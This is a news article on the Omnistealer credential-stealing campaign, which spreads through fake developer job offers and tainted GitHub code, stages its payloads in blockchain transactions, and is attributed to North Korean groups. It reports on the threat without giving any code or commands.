Cutting corners: The code looked harmless. A GitHub repository, a small freelance task, and a standard request sent over LinkedIn to a blockchain engineer: run this snippet, fix a few bugs, get paid. It was the sort of job offer that crosses developers' inboxes every day. It was also the entry point for a global credential-stealing operation that security researchers now say rivals major attacks like WannaCry in its potential impact.
The malware at the center of it, dubbed Omnistealer by investigators, uses public blockchains not just for payments, but as part of the delivery system itself. Once running, it digs through a victim's machine and pulls out almost everything of value.
Omnistealer's design is simple to trigger but complex under the hood. The initial code reaches out to the TRON or Aptos blockchains, which are attractive because on-chain operations are cheap. From there, it reads data hidden in those transactions and uses that information as a pointer to the Binance Smart Chain.
That chain in turn delivers more code, which then "fetches the final form – malicious code," said Nick Smart, chief intelligence officer at Crystal Intelligence. When that final payload executes, it activates the info-stealer. "It literally steals everything," Ellis Stannard, a core member of Ransom-ISAC, told PCMag. The group is a small, recently formed network of international cybersecurity professionals.
The "everything" in this case is broad. Ransom-ISAC's team found the malware works with more than 60 cryptocurrency wallet extensions, including MetaMask and Coinbase. It can target more than 10 password managers, including LastPass, more than 10 browsers such as Chrome and Firefox, and cloud services like Google Drive.
One infection can expose crypto holdings, corporate passwords, and sensitive documents at once. Investigators have tied around 300,000 stolen credentials to this operation so far, including data from cybersecurity firms, defense companies, and government agencies in countries such as the US and Bangladesh. They say that number is likely only a small part of the true total.
To reach those high-value environments, the attackers start lower in the stack: with developers and contractors. As of January, researchers saw two recurring roles in the scam. In one, the attackers pose as recruiters or intermediaries for well-known companies that outsource software engineering. In the other, they present themselves as freelance developers looking for work. Both roles lead back to the same technical move: they convince someone to run their GitHub code.
When the impostors act as recruiters, they "hire" freelance developers – often in South Asia – and send them test projects. The repository looks normal, the instructions are familiar, and there may even be pay for the work. Buried inside is the code that starts the blockchain-based chain reaction and ultimately deploys Omnistealer.
In the freelancer scenario, the malicious developer secures a contract and then submits tainted pull requests. "They push out garbage pull requests in GitHub that contain hidden malware," Stannard said. "Since this case, I haven't been able to look at GitHub the same way."
The focus on South Asian developers appears intentional. India was the largest source of new GitHub developers in 2025 and ranked first on Chainalysis's crypto adoption index that year, making it a prime hunting ground for technically skilled and crypto-savvy workers. Lower average incomes also make unsolicited job offers harder to ignore.
Following the money and the infrastructure led to familiar territory in state-sponsored hacking.
Investigators traced some activity to IP addresses in Vladivostok, Russia, including one linked to a former US consulate building that other teams have previously associated with North Korean operations.
Some of the crypto wallets used in this campaign match those seen in Lazarus Group's $1.5 billion theft from Dubai-based exchange Bybit in February 2025, as well as earlier attacks like WannaCry and the Sony Pictures hack.
At the same time, the social-engineering style looks more like the cluster known as Contagious Interview than classic Lazarus tradecraft, according to Nick Carlsen, a senior North Korea specialist at blockchain intelligence firm TRM Labs. He described Contagious as a "smaller subset group," noting that different branches of the North Korean state run their own hacking units, much as the CIA, FBI, and NSA do in the US.
For North Korea, Carlsen said, the primary goal in many cyber operations is still financial. Stolen cryptocurrency can fund nuclear and military programs. But the volume of credentials collected in this case opens other pathways.
He suggested the attackers could use those identities to build convincing fake profiles for North Korean IT workers, who could then open accounts not visibly tied to the country and help launder funds. They might also simply sell access to the accounts and passwords on underground markets. "Everything about this has DPRK (North Korea) written all over it," Stannard said. These, he added, are not hobbyists but "organized actors using malware that can extract both corporate access credentials and cryptocurrency, both extremely valuable resources for a widely sanctioned nation."
The technology choices behind the campaign make it difficult to fully shut down. Omnistealer's components are stored inside blockchain transactions, turning public ledgers into permanent hosting for attack data. As more blocks are added, those malicious records sink deeper, and tracking them requires long and expensive investigative work.
Ransom-ISAC has described "hiding malicious payloads within blockchain" as an emerging obfuscation technique. With AI-assisted coding tools now commonplace, copying the approach will be easier for less-skilled threat actors.
The researchers have shared their findings with the FBI's Internet Crime Complaint Center. The bureau said it is "aware of the DPRK utilizing social engineering tactics to target developers in the blockchain development space, and this technique highlights the continuing evolution of the DPRK's ability to exploit the web3 space." Officials declined to provide more detail, citing ongoing investigations.